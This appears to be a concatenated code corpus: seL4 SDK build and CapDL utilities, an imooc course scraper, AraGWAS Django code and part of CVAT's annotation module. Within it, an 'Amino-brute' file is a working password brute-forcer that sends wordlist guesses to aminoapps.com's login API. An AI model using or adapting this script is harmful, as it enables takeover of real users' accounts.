build_dir.mkdir(exist_ok=True, parents=True)
sel4_install_dir = build_dir / "install"
sel4_build_dir = build_dir / "build"
sel4_install_dir.mkdir(exist_ok=True, parents=True)
sel4_build_dir.mkdir(exist_ok=True, parents=True)
print(f"Building sel4: {sel4_dir=} {root_dir=} {build_dir=} {board=} {config=}")
config_args = list(board.kernel_options.items()) + list(config.kernel_options.items())
config_strs = []
for arg, val in sorted(config_args):
if isinstance(val, bool):
str_val = "ON" if val else "OFF"
else:
str_val = str(val)
s = f"-D{arg}={str_val}"
config_strs.append(s)
config_str = " ".join(config_strs)
platform = board.name
cmd = (
f"cmake -GNinja -DCMAKE_INSTALL_PREFIX={sel4_install_dir.absolute()} "\
f" -DPYTHON3={executable} " \
f" -DKernelPlatform={platform} {config_str} " \
f"-S {sel4_dir.absolute()} -B {sel4_build_dir.absolute()}")
r = system(cmd)
if r != 0:
raise Exception(f"Error configuring sel4: cmd={cmd}")
cmd = f"cmake --build {sel4_build_dir.absolute()}"
r = system(cmd)
if r != 0:
raise Exception(f"Error building sel4: cmd={cmd}")
cmd = f"cmake --install {sel4_build_dir.absolute()}"
r = system(cmd)
if r != 0:
raise Exception(f"Error installing sel4: cmd={cmd}")
elf = sel4_install_dir / "bin" / "kernel.elf"
dest = (
root_dir / "board" / board.name / config.name / "elf" / "sel4.elf"
)
dest.unlink(missing_ok=True)
copy(elf, dest)
# Make output read-only
dest.chmod(0o444)
include_dir = root_dir / "board" / board.name / config.name / "include"
for source in ("kernel_Config", "libsel4", "libsel4/sel4_Config", "libsel4/autoconf"):
source_dir = sel4_install_dir / source / "include"
for p in source_dir.rglob("*"):
if not p.is_file():
continue
rel = p.relative_to(source_dir)
dest = include_dir / rel
dest.parent.mkdir(exist_ok=True, parents=True)
dest.unlink(missing_ok=True)
copy(p, dest)
dest.chmod(0o444)
def build_elf_component(
component_name: str,
root_dir: Path,
build_dir: Path,
board: BoardInfo,
config: ConfigInfo,
defines: List[Tuple[str, str]]
) -> None:
"""Build a specific ELF component.
Right now this is either the loader or the monitor
"""
sel4_dir = root_dir / "board" / board.name / config.name
build_dir = build_dir / board.name / config.name / component_name
build_dir.mkdir(exist_ok=True, parents=True)
defines_str = " ".join(f"{k}={v}" for k, v in defines)
r = system(
f"BOARD={board.name} BUILD_DIR={build_dir.absolute()} GCC_CPU={board.gcc_cpu} SEL4_SDK={sel4_dir.absolute()} {defines_str} make -C {component_name}"
)
if r != 0:
raise Exception(
f"Error building: {component_name} for board: {board.name} config: {config.name}"
)
elf = build_dir / f"{component_name}.elf"
dest = (
root_dir / "board" / board.name / config.name / "elf" / f"{component_name}.elf"
)
dest.unlink(missing_ok=True)
copy(elf, dest)
# Make output read-only
dest.chmod(0o444)
def build_doc(root_dir):
output = root_dir / "doc" / "sel4cp_user_manual.pdf"
r = system(f'pandoc docs/manual.md -o {output}')
assert r == 0
def build_lib_component(
component_name: str,
root_dir: Path,
build_dir: Path,
board: BoardInfo,
config: ConfigInfo,
) -> None:
"""Build a specific library component.
Right now this is just libsel4.a
"""
sel4_dir = root_dir / "board" / board.name / config.name
build_dir = build_dir / board.name / config.name / component_name
build_dir.mkdir(exist_ok=True, parents=True)
r = system(
f"BUILD_DIR={build_dir.absolute()} GCC_CPU={board.gcc_cpu} SEL4_SDK={sel4_dir.absolute()} make -C {component_name}"
)
if r != 0:
raise Exception(
f"Error building: {component_name} for board: {board.name} config: {config.name}"
)
lib = build_dir / f"{component_name}.a"
lib_dir = root_dir / "board" / board.name / config.name / "lib"
dest = lib_dir / f"{component_name}.a"
dest.unlink(missing_ok=True)
copy(lib, dest)
# Make output read-only
dest.chmod(0o444)
link_script = Path(component_name) / "sel4cp.ld"
dest = lib_dir / "sel4cp.ld"
dest.unlink(missing_ok=True)
copy(link_script, dest)
# Make output read-only
dest.chmod(0o444)
crt0 = build_dir / "crt0.o"
dest = lib_dir / "crt0.o"
dest.unlink(missing_ok=True)
copy(crt0, dest)
# Make output read-only
dest.chmod(0o444)
include_dir = root_dir / "board" / board.name / config.name / "include"
source_dir = Path(component_name) / "include"
for p in source_dir.rglob("*"):
if not p.is_file():
continue
rel = p.relative_to(source_dir)
dest = include_dir / rel
dest.parent.mkdir(exist_ok=True, parents=True)
dest.unlink(missing_ok=True)
copy(p, dest)
dest.chmod(0o444)
def main() -> None:
parser = ArgumentParser()
parser.add_argument("--sel4", type=Path, required=True)
args = parser.parse_args()
sel4_dir = args.sel4.expanduser()
if not sel4_dir.exists():
raise Exception(f"sel4_dir: {sel4_dir} does not exist")
root_dir = Path("release") / f"{NAME}-sdk-{VERSION}"
tar_file = Path("release") / f"{NAME}-sdk-{VERSION}.tar.gz"
source_tar_file = Path("release") / f"{NAME}-source-{VERSION}.tar.gz"
dir_structure = [
root_dir / "doc",
root_dir / "bin",
root_dir / "board",
]
for board in SUPPORTED_BOARDS:
board_dir = root_dir / "board" / board.name
dir_structure.append(board_dir)
for config in SUPPORTED_CONFIGS:
config_dir = board_dir / config.name
dir_structure.append(config_dir)
dir_structure += [
config_dir / "include",
config_dir / "lib",
config_dir / "elf",
]
for dr in dir_structure:
dr.mkdir(exist_ok=True, parents=True)
copy(Path("LICENSE"), root_dir)
tool_target = root_dir / "bin" / "sel4cp"
if not tool_target.exists():
test_tool()
build_tool(tool_target)
build_doc(root_dir)
build_dir = Path("build")
for board in SUPPORTED_BOARDS:
for config in SUPPORTED_CONFIGS:
build_sel4(sel4_dir, root_dir, build_dir, board, config)
loader_defines = [
("LINK_ADDRESS", hex(board.loader_link_address))
]
build_elf_component("loader", root_dir, build_dir, board, config, loader_defines)
build_elf_component("monitor", root_dir, build_dir, board, config, [])
build_lib_component("libsel4cp", root_dir, build_dir, board, config)
# Setup the examples
for example, example_path in board.examples.items():
include_dir = root_dir / "board" / board.name / "example" / example
source_dir = example_path
for p in source_dir.rglob("*"):
if not p.is_file():
continue
rel = p.relative_to(source_dir)
dest = include_dir / rel
dest.parent.mkdir(exist_ok=True, parents=True)
dest.unlink(missing_ok=True)
copy(p, dest)
dest.chmod(0o444)
# At this point we create a tar.gz file
with tar_open(tar_file, "w:gz") as tar:
tar.add(root_dir, arcname=root_dir.name, filter=tar_filter)
# Build the source tar
process = popen("git ls-files")
filenames = [Path(fn.strip()) for fn in process.readlines()]
process.close()
source_prefix = Path(f"{NAME}-source-{VERSION}")
with tar_open(source_tar_file, "w:gz") as tar:
for filename in filenames:
tar.add(filename, arcname=source_prefix / filename, filter=tar_filter)
if __name__ == "__main__":
main()
```
#### File: tool/sel4coreplat/cdlutil.py
```python
from sel4coreplat import capdl
from typing import (Any, NamedTuple, Optional, Tuple, Union)
from sel4coreplat.capdl.Object import (register_object_sizes, ObjectType)
from sel4coreplat.util import (MemoryRegion)
from sel4coreplat.sysxml import (ProtectionDomain)
from sel4coreplat.sysxml import (SysMap, SysMemoryRegion)
def cdlsafe(string: str) -> str:
'''Turns a string into an object name that can be safely used in CapDL specs.'''
return ''.join(c.lower() if c.isalnum() else '_' for c in string)
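# For example, cdlsafe("Hello World-1") returns "hello_world_1".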
aarch64_sizes = {
ObjectType.seL4_TCBObject: 11,
ObjectType.seL4_EndpointObject: 4,
ObjectType.seL4_NotificationObject: 6,
ObjectType.seL4_SmallPageObject: 12,
ObjectType.seL4_LargePageObject: 21,
ObjectType.seL4_ASID_Pool: 12 ,
ObjectType.seL4_ASID_Table: 9,
ObjectType.seL4_Slot: 5,
# ObjectType.seL4_Value_MinUntypedBits: 4,
# ObjectType.seL4_Value_MaxUntypedBits: 47,
# ObjectType.seL4_Value_BadgeBits: 64,
ObjectType.seL4_RTReplyObject: 5,
ObjectType.seL4_VCPU: 12,
ObjectType.seL4_PageTableObject: 12,
ObjectType.seL4_PageDirectoryObject: 12,
ObjectType.seL4_ARM_SectionObject: 21,
ObjectType.seL4_ARM_SuperSectionObject: 25,
ObjectType.seL4_HugePageObject: 30,
ObjectType.seL4_AARCH64_PGD: 12,
ObjectType.seL4_AARCH64_PUD: 12,
ObjectType.seL4_IOPageTableObject: 12,
ObjectType.seL4_X64_PDPT: 12,
ObjectType.seL4_X64_PML4: 12,
ObjectType.seL4_SchedContextObject: 8,
# ObjectType.seL4_IOPorts: 0,
# ObjectType.seL4_IODevice: 0,
# ObjectType.seL4_ARMIODevice: 0,
# ObjectType.seL4_IRQ: 0,
# ObjectType.seL4_IOAPICIRQ: 0,
# ObjectType.seL4_MSIIRQ: 0,
# ObjectType.seL4_ARMIRQ: 0,
# ObjectType.seL4_ARMSID: 0,
# ObjectType.seL4_ARMCB: 0,
}
def register_aarch64_sizes() -> None:
register_object_sizes(aarch64_sizes)
# Structured objects for keeping track of CDL-specific info in __main__:
MRInfoNotELF = NamedTuple('MRInfoNotELF', [])
MRInfoELF = NamedTuple('MRInfoELF', [('pd_name', str), ('seg_index', int)])
MRInfo = Union[MRInfoNotELF, MRInfoELF]
PageInfoNotELF = NamedTuple('PageInfoNotELF', [])
PageInfoELF = NamedTuple('PageInfoELF', [('pd_name', str), ('seg_index', int), ('index', int)])
PageInfo = Union[PageInfoNotELF, PageInfoELF]
def mrinfo_to_pageinfo(mri: MRInfo, index: int) -> PageInfo:
if isinstance(mri, MRInfoELF):
return PageInfoELF(mri.pd_name, mri.seg_index, index)
return PageInfoNotELF()
# Structured objects for keeping track of the mapping table.
# A mapping table is required because the capdl initialiser sort of reverses
# how sel4 expects things to be mapped. In sel4 you provide a vaddr that is
# resolved from the top of the vspace. Think of the vaddr as providing the
# path to get from the top-level paging structure (the pgd), all the way to
# the specific slot. While in capdl you construct this vaddr from its
# components (the slot being mapped to in the current level, and the slots
# that the various structures are mapped to in the higher levels).
# Hence, to generate the CapDL, we need the mapping table to reverse this
# mapping.
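# On AArch64 with a 4 KiB granule, a virtual address decomposes (top down) into
# 9-bit PGD, PUD, PD and PT indices plus a 12-bit page offset; hence the
# 12/21/30/39-bit alignments recorded in alignment_of_sort below.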
GlobalDir = NamedTuple('GlobalDir', [('pd_index', int)])
UpperDir = NamedTuple('UpperDir', [('pd_index',int)])
LowerDir = NamedTuple('LowerDir', [('pd_index',int)])
PTable = NamedTuple('PTable', [('pd_index',int)])
PFrame = NamedTuple('PFrame', [('pd_index',int),('page_size', int)])
MTESort = Union[GlobalDir, UpperDir, LowerDir, PTable, PFrame]
MTE = NamedTuple('MTE', # mapping table entry
[('sort', MTESort),
('vaddr', int)])
alignment_of_sort = {
PFrame: 12,
PTable: 12 + 9,
LowerDir: 12 + 9 + 9,
UpperDir: 12 + 9 + 9 + 9,
GlobalDir: 12 + 9 + 9 + 9 # faux, see vaddr_to_gd
}
def alignment_of_mte(mte: MTE) -> int:
if isinstance(mte.sort, PFrame):
return alignment_of_sort[PFrame]
if isinstance(mte.sort, PTable):
return alignment_of_sort[PTable]
if isinstance(mte.sort, LowerDir):
return alignment_of_sort[LowerDir]
if isinstance(mte.sort, UpperDir):
return alignment_of_sort[UpperDir]
if isinstance(mte.sort, GlobalDir):
return alignment_of_sort[GlobalDir]
raise ValueError()
def vaddr_to_gd(vaddr: int) -> MTE:
# this is a faux MTE to facilitate parent lookups for PUDs
alignment = alignment_of_sort[GlobalDir]
truncated = (vaddr >> alignment) << alignment
return MTE(GlobalDir(0), truncated)
def vaddr_to_ud(vaddr: int) -> MTE:
alignment = alignment_of_sort[UpperDir]
truncated = (vaddr >> alignment) << alignment
# FIXME These numbers are ad-hoc and will fail with multiple PDs.
# vaddr fns should take an arg for pd_index instead
return MTE(UpperDir(1), truncated)
def vaddr_to_d(vaddr: int) -> MTE:
alignment = alignment_of_sort[LowerDir]
truncated = (vaddr >> alignment) << alignment
return MTE(LowerDir(2), truncated)
def vaddr_to_pt(vaddr: int) -> MTE:
alignment = alignment_of_sort[PTable]
truncated = (vaddr >> alignment) << alignment
return MTE(PTable(3), truncated)
def vaddr_to_pf(vaddr: int, page_size: int) -> MTE:
return MTE(PFrame(4, page_size), vaddr)
def parent_mte_of(mte: MTE) -> MTE:
if isinstance(mte.sort, UpperDir):
return vaddr_to_gd(mte.vaddr)
if isinstance(mte.sort, LowerDir):
return vaddr_to_ud(mte.vaddr)
if isinstance(mte.sort, PTable):
return vaddr_to_d(mte.vaddr)
if isinstance(mte.sort, PFrame):
return vaddr_to_pt(mte.vaddr)
raise ValueError()
def mapping_slot_of(current_mte: MTE) -> int:
'''Returns the slot number of an MTE inside its parent in the CapDL.'''
parent_mte = parent_mte_of(current_mte)
slot = current_mte.vaddr - parent_mte.vaddr
alignment = alignment_of_mte(current_mte)
return (slot >> alignment)
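# Worked example (hypothetical values): a 4 KiB frame at vaddr 0x40001000 falls
# in the page table covering 0x40000000-0x401fffff, so
# mapping_slot_of(vaddr_to_pf(0x40001000, 0x1000)) == 0x1000 >> 12 == 1.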
``` |
{
"source": "100123546/Amino-brute",
"score": 3
} |
#### File: Amino-brute/app/brute_email.py
```python
import configparser
import aiohttp
import asyncio
config = configparser.ConfigParser()
config.read("settings.ini")
async def brute(password, email):
    for word in password:
        word = str(word).replace('\n', '')
        jsonData = {'recaptcha_challenge': config["system"]["recaptcha_challenge"], 'recaptcha_version': config["system"]["recaptcha_version"], 'auth_type': 0, 'secret': word, 'email': email}
        async with aiohttp.ClientSession() as session:
            async with session.post('https://aminoapps.com/api/auth', json=jsonData) as resp:
                r = await resp.json()
        # asyncio.sleep keeps the event loop responsive between attempts.
        await asyncio.sleep(0.5)
        try:
            if 'nickname' in r['result'] or 'title' in r['result']:
                passwordFound = open('password_result.txt', 'w+')
                passwordFound.write(f'{email}:{word}\n')
                passwordFound.close()
                print(f'[S.W.M] --> Password found!\n\n[S.W.M] --> Password: {str(word)}')
                return False
            else:
                print(f'[S.W.M] Password {str(word)} did not match.')
        except KeyError:
            pass
``` |
{
"source": "100156994/python",
"score": 3
} |
#### File: 100156994/python/spider.py
```python
import requests,re,bs4
url="https://www.imooc.com/course/list"
req=requests.get(url)
req.encoding="UTF-8"
soup=bs4.BeautifulSoup(req.text,'lxml')
li=soup.find_all("li",class_="course-nav-item ")
lb = []  # direction + category; structure: name, link
for index in range(len(li)):
lb.append([li[index].text,li[index].a.get('href')])
def deal(path):
    r = requests.get(url + path)
    r.encoding = "UTF-8"
    soup = bs4.BeautifulSoup(r.text, 'lxml')
    pages = soup.find_all('div', class_='page')
    m = len(pages[0].find_all('a'))
    cons = []
    for k in range(1, m + 2):
        resp = requests.get(url + path + "&page=%d" % (k))
        resp.encoding = "UTF-8"
        soup = bs4.BeautifulSoup(resp.text, 'lxml')
        contex = soup.find_all('div', class_="course-card-container")
        # Detailed contents for each course link; structure: course name, level, enrollment, duration, score, notes, link
for index in range(len(contex)):
spans=contex[index].find_all('span')
rs=requests.get('https://www.imooc.com'+contex[index].a.get('href'))
s=bs4.BeautifulSoup(rs.text,'lxml')
lon=s.find_all('div',class_='static-item l')
grade=s.find('div',class_='static-item l score-btn')
cons.append([contex[index].h3.text,spans[0].text,spans[1].text,lon[2].find_all('span',class_="meta-value")[0].text,grade.find_all('span',class_="meta-value")[0].text,contex[index].p.text,contex[index].a.get('href')])
return cons
``` |
{
"source": "1001genomes/AraGWAS",
"score": 2
} |
#### File: aragwas_server/gwasdb/apps.py
```python
from django.apps import AppConfig
class GwasdbConfig(AppConfig):
name = 'gwasdb'
def ready(self):
super(GwasdbConfig, self).ready()
# import myapp.signals
import gwasdb.checks
```
#### File: management/commands/import_phenotypes.py
```python
from django.core.management.base import BaseCommand, CommandError
from gwasdb.models import Phenotype
import requests
class Command(BaseCommand):
help = 'Index AraPheno phenotypes in AraGWASCatalog'
def add_arguments(self, parser):
parser.add_argument('--id',
dest='phenotype_id',
type=int,
default=None,
help='Specify a primary key to index a specific phenotype. If empty will check entire phenotype list.')
parser.add_argument('--update',
dest='update',
type=bool,
default=False,
help='Update existing phenotypes.')
def handle(self, *args, **options):
phenotype_id = options.get('phenotype_id', None)
update = options.get('update', False)
try:
            if phenotype_id:
                # Fetch a single record; assumes AraPheno's per-phenotype REST endpoint.
                r = requests.get('https://arapheno.1001genomes.org/rest/phenotype/%s.json' % phenotype_id)
                phenos_arapheno = [r.json()]
else:
# Retrieve list of all phenotypes from AraPheno:
r = requests.get('https://arapheno.1001genomes.org/rest/phenotype/list.json')
phenos_arapheno = r.json()
# check if phenotypes are stored in AraGWASCatalog
ids_aragwas = Phenotype.objects.all().values_list('id', flat=True)
counter = 0
for pheno in phenos_arapheno:
if pheno['phenotype_id'] not in ids_aragwas or update:
# Add to table:
p = Phenotype(pk=pheno['phenotype_id'], name=pheno['name'], study_name=pheno['study'], description=pheno['scoring'], date=pheno['integration_date'], arapheno_link="https://arapheno.1001genomes.org/phenotype/"+str(pheno['phenotype_id']), trait_ontology_id=pheno['to_term'] if pheno['to_term'] is not None else "", trait_ontology_name=pheno['to_name'] if pheno['to_name'] is not None else "", trait_ontology_description=pheno['to_definition'])
p.save()
counter += 1
# else:
# # add ontology information (this line will be removed after one call...
# p = Phenotype.objects.get(pk=pheno['phenotype_id'])
# p.trait_ontology_id = pheno['to_term'] if pheno['to_term'] is not None else ""
# p.trait_ontology_name = pheno['to_name'] if pheno['to_name'] is not None else ""
# p.trait_ontology_description=pheno['to_definition']
# p.save()
# counter += 1
print(str(counter) + ' new phenotype(s) added to the database.')
except Exception as err:
raise CommandError(
'Error saving phenotypes. Reason: %s' % str(err))
```
#### File: aragwas_server/gwasdb/serializers.py
```python
from rest_framework import serializers
from gwasdb.models import Study, Genotype, Phenotype
class ApiVersionSerializer(serializers.Serializer):
"""Serializers the API version information"""
version = serializers.CharField(read_only=True)
githash = serializers.CharField(read_only=True)
build = serializers.CharField(read_only=True)
build_url = serializers.URLField(read_only=True)
github_url = serializers.URLField(read_only=True)
date = serializers.DateField(read_only=True)
class GenotypeSerializer(serializers.ModelSerializer):
class Meta:
model = Genotype
fields = '__all__'
class EsPhenotypeSerializer(serializers.ModelSerializer):
"""Serializer for elasticserach"""
suggest = serializers.SerializerMethodField()
def get_suggest(self, instance):
return [instance.name]
class Meta:
model = Phenotype
fields = ('id', 'suggest', 'name', 'study_name', 'description', 'date')
class EsGenotypeSerializer(serializers.ModelSerializer):
"""Serializer for elasticserach"""
class Meta:
model = Genotype
fields = ('id', 'name', 'description', 'version')
class EsStudySerializer(serializers.ModelSerializer):
"""Serializer for elasticserach"""
suggest = serializers.SerializerMethodField()
genotype = EsGenotypeSerializer(many=False)
phenotype = EsPhenotypeSerializer(many=False)
def get_suggest(self, instance):
return [instance.name]
class Meta:
model = Study
fields = ('id', 'suggest', 'name', 'transformation', 'method', 'genotype', 'phenotype','n_hits_bonf','n_hits_perm','n_hits_thr')
"""
Study List Serializer Class (read-only)
"""
class StudySerializer(serializers.ModelSerializer):
association_count = serializers.SerializerMethodField()
genotype = serializers.SerializerMethodField()
phenotype = serializers.SerializerMethodField()
phenotype_pk = serializers.SerializerMethodField()
phenotype_description = serializers.SerializerMethodField()
phenotype_to_id = serializers.SerializerMethodField()
phenotype_to_name = serializers.SerializerMethodField()
phenotype_to_description = serializers.SerializerMethodField()
class Meta:
model = Study
fields = ('name','genotype','phenotype','phenotype_pk','phenotype_description','method','transformation', 'publication', 'publication_pmid',
'association_count','pk','n_hits_bonf','n_hits_perm','n_hits_fdr','n_hits_thr','bonferroni_threshold',
'permutation_threshold','bh_threshold','number_samples', 'number_countries', 'doi', 'phenotype_to_id', 'phenotype_to_name', 'phenotype_to_description')
def get_association_count(self, obj):
try:
return obj.association_set.count()
except:
return ""
def get_genotype(self, obj):
try:
return "{} v{}".format(obj.genotype.name, obj.genotype.version)
except:
return ""
def get_phenotype(self, obj):
try:
return obj.phenotype.name
except:
return ""
def get_phenotype_pk(self,obj):
try:
return obj.phenotype.pk
except:
return ""
def get_phenotype_description(self,obj):
try:
return obj.phenotype.description
except:
return ""
def get_phenotype_to_id(self,obj):
try:
return obj.phenotype.trait_ontology_id
except:
return ""
def get_phenotype_to_name(self,obj):
try:
return obj.phenotype.trait_ontology_name
except:
return ""
def get_phenotype_to_description(self,obj):
try:
return obj.phenotype.trait_ontology_description
except:
return ""
"""
Phenotype List Serializer Class (read-only)
"""
class PhenotypeListSerializer(serializers.ModelSerializer):
class Meta:
model = Phenotype
fields = ('name','description','arapheno_link','pk','study_set','trait_ontology_id','trait_ontology_name','trait_ontology_description')
``` |
{
"source": "100330734/cvat",
"score": 2
} |
#### File: apps/engine/annotation.py
```python
import os
import copy
from django.utils import timezone
from collections import OrderedDict
import numpy as np
from scipy.optimize import linear_sum_assignment
from distutils.util import strtobool
from xml.sax.saxutils import XMLGenerator
from abc import ABCMeta, abstractmethod
from PIL import Image
import django_rq
from django.conf import settings
from django.db import transaction
from cvat.apps.profiler import silk_profile
from cvat.apps.engine.plugins import plugin_decorator
from . import models
from .task import get_frame_path, get_image_meta_cache
from .log import slogger
############################# Low Level server API
FORMAT_XML = 1
FORMAT_JSON = 2
def dump(tid, data_format, scheme, host):
"""
Dump annotation for the task in specified data format.
"""
queue = django_rq.get_queue('default')
queue.enqueue_call(func=_dump, args=(tid, data_format, scheme, host, OrderedDict()),
job_id="annotation.dump/{}".format(tid))
def check(tid):
"""
Check that potentially long operation 'dump' is completed.
Return the status as json/dictionary object.
"""
queue = django_rq.get_queue('default')
job = queue.fetch_job("annotation.dump/{}".format(tid))
if job is None:
response = {"state": "unknown"}
elif job.is_failed:
        # FIXME: here we have a potential race. In general job.exc_info is
        # initialized inside the handler, but the method can be called before
        # that. For some reason exc_info isn't initialized by RQ's Python code.
response = {
"state": "error",
"stderr": job.exc_info}
elif job.is_finished:
response = {"state": "created"}
else:
response = {"state": "started"}
return response
@transaction.atomic
def get(jid):
"""
Get annotations for the job.
"""
db_job = models.Job.objects.select_for_update().get(id=jid)
annotation = _AnnotationForJob(db_job)
annotation.init_from_db()
return annotation.to_client()
@silk_profile(name="Save job")
@plugin_decorator
@transaction.atomic
def save_job(jid, data):
"""
Save new annotations for the job.
"""
slogger.job[jid].info("Enter save_job API: jid = {}".format(jid))
db_job = models.Job.objects.select_related('segment__task') \
.select_for_update().get(id=jid)
annotation = _AnnotationForJob(db_job)
annotation.force_set_client_id(data['create'])
client_ids = annotation.validate_data_from_client(data)
annotation.delete_from_db(data['delete'])
annotation.save_to_db(data['create'])
annotation.update_in_db(data['update'])
updated = sum([ len(data["update"][key]) for key in data["update"] ])
deleted = sum([ len(data["delete"][key]) for key in data["delete"] ])
created = sum([ len(data["create"][key]) for key in data["create"] ])
if updated or deleted or created:
db_job.segment.task.updated_date = timezone.now()
db_job.segment.task.save()
db_job.max_shape_id = max(db_job.max_shape_id, max(client_ids['create']) if client_ids['create'] else -1)
db_job.save()
slogger.job[jid].info("Leave save_job API: jid = {}".format(jid))
@silk_profile(name="Clear job")
@transaction.atomic
def clear_job(jid):
"""
Clear annotations for the job.
"""
slogger.job[jid].info("Enter clear_job API: jid = {}".format(jid))
db_job = models.Job.objects.select_related('segment__task') \
.select_for_update().get(id=jid)
annotation = _AnnotationForJob(db_job)
annotation.delete_all_shapes_from_db()
annotation.delete_all_paths_from_db()
db_job.segment.task.updated_date = timezone.now()
db_job.segment.task.save()
slogger.job[jid].info("Leave clear_job API: jid = {}".format(jid))
# pylint: disable=unused-argument
@silk_profile(name="Save task")
def save_task(tid, data):
"""
Save new annotations for the task.
"""
slogger.task[tid].info("Enter save_task API: tid = {}".format(tid))
db_task = models.Task.objects.get(id=tid)
db_segments = list(db_task.segment_set.prefetch_related('job_set').all())
splitted_data = {}
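    # Split the client payload per segment so each job only receives the
    # shapes and paths that fall inside its frame range.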
for segment in db_segments:
jid = segment.job_set.first().id
start = segment.start_frame
stop = segment.stop_frame
splitted_data[jid] = {}
for action in ['create', 'update', 'delete']:
splitted_data[jid][action] = {
"boxes": list(filter(lambda x: start <= int(x['frame']) <= stop, data[action]['boxes'])),
"polygons": list(filter(lambda x: start <= int(x['frame']) <= stop, data[action]['polygons'])),
"polylines": list(filter(lambda x: start <= int(x['frame']) <= stop, data[action]['polylines'])),
"points": list(filter(lambda x: start <= int(x['frame']) <= stop, data[action]['points'])),
"box_paths": list(filter(lambda x: len(list(filter(lambda y: (start <= int(y['frame']) <= stop) and (not y['outside']), x['shapes']))), data[action]['box_paths'])),
"polygon_paths": list(filter(lambda x: len(list(filter(lambda y: (start <= int(y['frame']) <= stop) and (not y['outside']), x['shapes']))), data[action]['polygon_paths'])),
"polyline_paths": list(filter(lambda x: len(list(filter(lambda y: (start <= int(y['frame']) <= stop) and (not y['outside']), x['shapes']))), data[action]['polyline_paths'])),
"points_paths": list(filter(lambda x: len(list(filter(lambda y: (start <= int(y['frame']) <= stop) and (not y['outside']), x['shapes']))), data[action]['points_paths'])),
}
for jid, _data in splitted_data.items():
        # if any item inside _data is non-empty we need to call save_job
isNonEmpty = False
for action in ['create', 'update', 'delete']:
for objects in _data[action].values():
if objects:
isNonEmpty = True
break
if isNonEmpty:
save_job(jid, _data)
slogger.task[tid].info("Leave save_task API: tid = {}".format(tid))
# pylint: disable=unused-argument
@silk_profile(name="Clear task")
def clear_task(tid):
"""
Clear annotations for the task.
"""
slogger.task[tid].info("Enter clear_task API: tid = {}".format(tid))
db_task = models.Task.objects.get(id=tid)
db_segments = list(db_task.segment_set.prefetch_related('job_set').all())
for db_segment in db_segments:
for db_job in list(db_segment.job_set.all()):
clear_job(db_job.id)
slogger.task[tid].info("Leave clear_task API: tid = {}".format(tid))
# pylint: disable=unused-argument
def rq_handler(job, exc_type, exc_value, traceback):
tid = job.id.split('/')[1]
    slogger.task[tid].error("dump annotation error occurred", exc_info=True)
##################################################
class _Label:
def __init__(self, db_label):
self.id = db_label.id
self.name = db_label.name
class _Attribute:
def __init__(self, db_attr, value):
self.id = db_attr.id
self.name = db_attr.get_name()
if db_attr.get_type() == 'checkbox':
self.value = str(value).lower()
else:
self.value = str(value)
class _BoundingBox:
def __init__(self, x0, y0, x1, y1, frame, occluded, z_order, client_id=None, attributes=None):
self.xtl = x0
self.ytl = y0
self.xbr = x1
self.ybr = y1
self.occluded = occluded
self.z_order = z_order
self.client_id = client_id
self.frame = frame
self.attributes = attributes if attributes else []
def merge(self, box):
# The occluded property and attributes cannot be merged. Let's keep
# original attributes and occluded property of the self object.
assert self.frame == box.frame
self.xtl = (self.xtl + box.xtl) / 2
self.ytl = (self.ytl + box.ytl) / 2
self.xbr = (self.xbr + box.xbr) / 2
self.ybr = (self.ybr + box.ybr) / 2
def add_attribute(self, attr):
self.attributes.append(attr)
class _LabeledBox(_BoundingBox):
def __init__(self, label, x0, y0, x1, y1, frame, group_id, occluded, z_order, client_id=None, attributes=None):
super().__init__(x0, y0, x1, y1, frame, occluded, z_order, client_id, attributes)
self.label = label
self.group_id = group_id
class _TrackedBox(_BoundingBox):
def __init__(self, x0, y0, x1, y1, frame, occluded, z_order, outside, attributes=None):
super().__init__(x0, y0, x1, y1, frame, occluded, z_order, None, attributes)
self.outside = outside
class _InterpolatedBox(_TrackedBox):
def __init__(self, x0, y0, x1, y1, frame, occluded, z_order, outside, keyframe, attributes=None):
super().__init__(x0, y0, x1, y1, frame, occluded, z_order, outside, attributes)
self.keyframe = keyframe
class _PolyShape:
def __init__(self, points, frame, occluded, z_order, client_id=None, attributes=None):
self.points = points
self.frame = frame
self.occluded = occluded
self.z_order = z_order
self.client_id=client_id
self.attributes = attributes if attributes else []
def add_attribute(self, attr):
self.attributes.append(attr)
class _LabeledPolyShape(_PolyShape):
def __init__(self, label, points, frame, group_id, occluded, z_order, client_id=None, attributes=None):
super().__init__(points, frame, occluded, z_order, client_id, attributes)
self.label = label
self.group_id = group_id
class _TrackedPolyShape(_PolyShape):
def __init__(self, points, frame, occluded, z_order, outside, attributes=None):
super().__init__(points, frame, occluded, z_order, None, attributes)
self.outside = outside
class _InterpolatedPolyShape(_TrackedPolyShape):
def __init__(self, points, frame, occluded, z_order, outside, keyframe, attributes=None):
super().__init__(points, frame, occluded, z_order, outside, attributes)
self.keyframe = keyframe
class _BoxPath:
def __init__(self, label, start_frame, stop_frame, group_id, boxes=None, client_id=None, attributes=None):
self.label = label
self.frame = start_frame
self.stop_frame = stop_frame
self.group_id = group_id
self.boxes = boxes if boxes else []
self.client_id = client_id
self.attributes = attributes if attributes else []
self._interpolated_boxes = []
assert not self.boxes or self.boxes[-1].frame <= self.stop_frame
def add_box(self, box):
self.boxes.append(box)
def get_interpolated_boxes(self):
if not self._interpolated_boxes:
self._init_interpolated_boxes()
return self._interpolated_boxes
def _init_interpolated_boxes(self):
assert self.boxes[-1].frame <= self.stop_frame
boxes = []
stop_box = copy.copy(self.boxes[-1])
stop_box.frame = self.stop_frame + 1
attributes = {}
for box0, box1 in zip(self.boxes, self.boxes[1:] + [stop_box]):
assert box0.frame < box1.frame
distance = float(box1.frame - box0.frame)
delta_xtl = (box1.xtl - box0.xtl) / distance
delta_ytl = (box1.ytl - box0.ytl) / distance
delta_xbr = (box1.xbr - box0.xbr) / distance
delta_ybr = (box1.ybr - box0.ybr) / distance
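            # For example (hypothetical values): keyframes at frame 0 (xtl=0) and
            # frame 4 (xtl=8) give delta_xtl=2, so frames 0-3 get xtl 0, 2, 4, 6.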
# New box doesn't have all attributes (only first one does).
# Thus it is necessary to propagate them.
for attr in box0.attributes:
attributes[attr.id] = attr
for frame in range(box0.frame, box1.frame):
off = frame - box0.frame
xtl = box0.xtl + delta_xtl * off
ytl = box0.ytl + delta_ytl * off
xbr = box0.xbr + delta_xbr * off
ybr = box0.ybr + delta_ybr * off
box = _InterpolatedBox(xtl, ytl, xbr, ybr, frame, box0.occluded, box0.z_order,
box0.outside, box0.frame == frame, list(attributes.values()))
boxes.append(box)
if box0.outside:
break
self._interpolated_boxes = boxes
def merge(self, path):
assert self.label.id == path.label.id
boxes = {box.frame:box for box in self.boxes}
for box in path.boxes:
